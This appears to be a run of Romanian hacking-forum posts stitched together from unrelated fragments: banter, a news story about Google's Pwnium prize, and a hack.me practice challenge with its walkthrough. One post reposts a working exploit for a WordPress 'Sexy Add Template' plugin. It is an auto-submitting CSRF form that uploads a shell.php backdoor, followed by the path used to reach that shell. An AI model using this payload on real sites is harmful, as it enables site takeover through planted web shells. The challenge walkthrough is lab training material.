StoNe-

Mul?umesc. Chiar aveam nevoie. @hintui?tii: V-a dat destule informa?ii - este criptat de 2 ori.

WordPress Sexy Add Template third party plugin suffers from a cross site request forgery vulnerability that can allow for a remote shell upload. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/ ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ] ./Security Risk : [ Critical Level ] ./Category XPL : [ WebApps/ZeroDay ] ./Tested On : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID ./Time & Date : September, 22 2012. 10:27 AM. Jakarta, Indonesia. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| -=[ Use It At Your Risk ]=- ||| ||| This Was Written For Educational Purpos Only ||| ||| Author Will Be Not Responsible For Any Damage ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ################################################################################# # # [ Information Details ] # - Wordpress Plugin Sexy Add Template: # Attacker allow CSRF Upload Shell. # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce". # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title> # </head> # <body onload="document.form0.submit();"> # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" > # <input type="hidden" name="newfile" value="yes" /> # <input type="hidden" type="text" value="shell.php" name="AM_filename"> # <textarea type="hidden" name="AM_file_content"> # [ Your Script Backdoor/Shell ] # </textarea> # </form> # </body> # </html> # # - Access Shell: # http://localhost/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!! # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # - Special Thanks: # ...:::' 1337day - Inj3ct0r TEAM ':::... # BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, # , And All Inj3ct0r Fans & All Hacktivist,,, Source: WordPress Sexy Add Template CSRF Shell Upload ? Packet Storm

Ai pm.

Din câte ?tiu ?i cred c? ?tiu bine, nu sunt permise challengeurile c?rora nici autorul lor nu ?tie rezolvarea.

Welcome, Lukasz. OFF: Bre, nu cumva acest individ este vreun cineva care are chef de caterinc? sau vreun diicot-ian? Urmari?i frazele: Ce „englej” ar scrie atâ?ia „I'm” ? @MrEnrich: Urm?re?te anumite prezentari ?i î?i vei da seama de ce am scris asta.

Cel mai norocos "tocilar" din lume despre Bar Refaeli. "A fost ca si cum as fi sarutat Paradisul" Bag?-i t?ticule, bag?-i.

Compania Google ofera un premiu impresionant hackerilor care vor reusi sa sparga sistemul de operare Chrome OS, in cadrul concursului Pwnium. Chrome OS este un sistem de operare dezvoltat de Google, care vine preinstalat pe unele dispozitive precumultrabook-urile Samsung Chromebook. Initial, premiul oferit de Google era de un milion de dolari, suma crescand ulterior la doua milioane, ca in final sa ajunga la peste trei milioane de dolari, mai exact 3,14159 milioane de dolari - aluzie la valoarea "pi". Este putin probabil ca o singura persoana sa castige marele premiu, scrie Live Science. In schimb, Google va oferi cate 110.000 dolari fiecarui hacker care va reusi sa compromita temporar sistemul de operare. Aplicatiile trebuie trimise prin intermediul unor pagini web, de pe un Chromebook model Samsung 550, folosind o conexiune Wi-Fi. Prin acest concurs, Google vrea sa-si imbunatateasca sistemul de operare, afland care sunt punctele slabe in prezent. Compania a mai organizat doua concursuri Pwnium, in anul 2012, insa acestea vizau spargerea browserului Chrome, nu a sistemului de operare. Spre deosebire de un alt concurs, Pwn20wn, unde hackerii erau obligati sa-si dezvaluie identitatea, acum concurentii nu trebuie sa-si foloseasca numele reale. Unul dintre cei mai cunoscuti hackeri, care a castigat cate 60.000 de dolari la fiecare concurs Pwnium, este un adolescent cunoscut doar sub pseudonimul Pinkie Pie. Alte premii care au fost oferite de Google, in cadrul concursului Pwn20wn, sunt: 100.000 dolari pentru spargerea browserului Chrome, 60.000 dolari pentru Mozilla Firefox, 65.000 $ pentru Apple Safari, 100.000 $ pentru Internet Explorer cu Windows 8. Sursa: Google ofera un premiu de peste 3 milioane de dolari celor care blocheaza sistemul Chrome OS

True story. Mai conteaz? când omu' moare de foame?

Posibil s? fie un trolling, dar tind s? cred c? omul chiar ?tie ceva doar c? ?i-a pierdut via?a.

Eu nu ?tiu dac? s? râd sau s? plâng.

That's not a medium challenge! Anyway, thanks.

Vecinu', preg?te?te-te c? vin.

Ai postat aici mesajul ?sta s? te lini?tim noi ? Cum a spus cineva mai sus, ciuta?i de ??tia vor fi mereu. Vezi dac? nu ai vrut s?-i dai admin pe cese? Acum prime?ti mail de la diicot ?i fbi.

Au descoperit b?ie?ii de la DIICOT cel mai jmeker de jmeker program de cr?pat ?i picat saituri - cmd.exe @Zatarra: Nu.

De când un limbaj de programare scris în greensl?b?z te face hec?r?

Okay, având în vedere c? nimeni nu a rezolvat acest challenge, v? voi ar?ta un algoritm prin care putea fi rezolvat. În prim plan, avem nevoie de browserul Firefox ?i addon-ul Web Developer. Fiind în prima pagin? a challengeului, nu vedem nimic ce ne ar putea ajuta. Vom merge în sursa paginii, pentru a vedea codul sursa HTML furnizat de c?tre browser. Aici observ?m urm?torul cod: <input type="hidden" name="LetMeIn" value="False"> Observ?m c? acesta ?ine de login cu valoarea bool „False”. Dac? ar fi s? îl traducem - „Las?-m? s? intru” - Fals. Noi avem nevoie ca aceast? valoare bool s? fie pe True. Okay, acum ne vom folosi de addon-ul care l-am instalat ulterior. Vom selecta Display - Display form details, dup? care vom seta valoarea pe True. Login bypass with success. Pagina ne va trimite un cod javascript alert, cu urm?torul con?inut: %53%65%72%69%61%6C%20%4E%75%6D%62%65%72%3A%20%54%52%56%4E%2D%36%37%51%32%2D%52%55%39%38%2D%35%34%36%46%2D%48%31%5A%54 Observ?m c? el este un hexcode. Îl vom decripta, pentru a vedea ce rezultat vom primi. Dup? decriptare, acel cod va deveni: Serial Number: TRVN-67Q2-RU98-546F-H1ZT Ad?ugând acest serial în input-ul aferent, vom primi mesajul „Congrats.”! That's all - simple, right?

Salut ?i bine ai venit. Încearc? sa "furi" tot ce po?i de p-aici.

Nimeni nu î?i d? seama?

Eu nu am nimic cu oamenii care acceseaza facebook doar pentru a-si face acolo, de-o acadea. In schimb cei ce isi baga poze cu ei din 5 in 5 minute si nu pot trai cu PC-ul deschis daca nu au in chrome deschis facebook, sunt trasniti de fulger. 80% din subiectele legate de facebook, pe rst, sunt intr-o anumita masura ok.

Target: http://s6714-101101-xcp.tarentum.hack.me/ch010 Pentru cei ce intampina erori la accesarea linkului de mai sus ( am impresia ca functioneaza pe sesiuni ): First of all, create an account or login via facebook or google at: https://hack.me 1. https://hack.me/101101/owasp-hackem-challenges.html 2. Create a "sandabox" ( then "Open" ) 3. Choose last challenge ( #10 ) Obiectiv: a) Bypass login Obtine serial number-ul c) Urmeaza acei pasi, pana obtii o pagina la fel ca in imaginea: http://i45.tinypic.com/5b7o8k.png d) PM cu serialul P.S: Challenge inspirat din postul lui fi8svrs Hint keywords: Y2hhcmFjdGVycywgamF2YXNjcmlwdCwgYWxlcnQsIGhleGNvZGU= Challenge closed.

Important este ca omul a facut ceva. Tu vrei softuri cu, care sa cr?pi saituri ?

În ce este codat?

Thanks a lot for challenge. I was bored.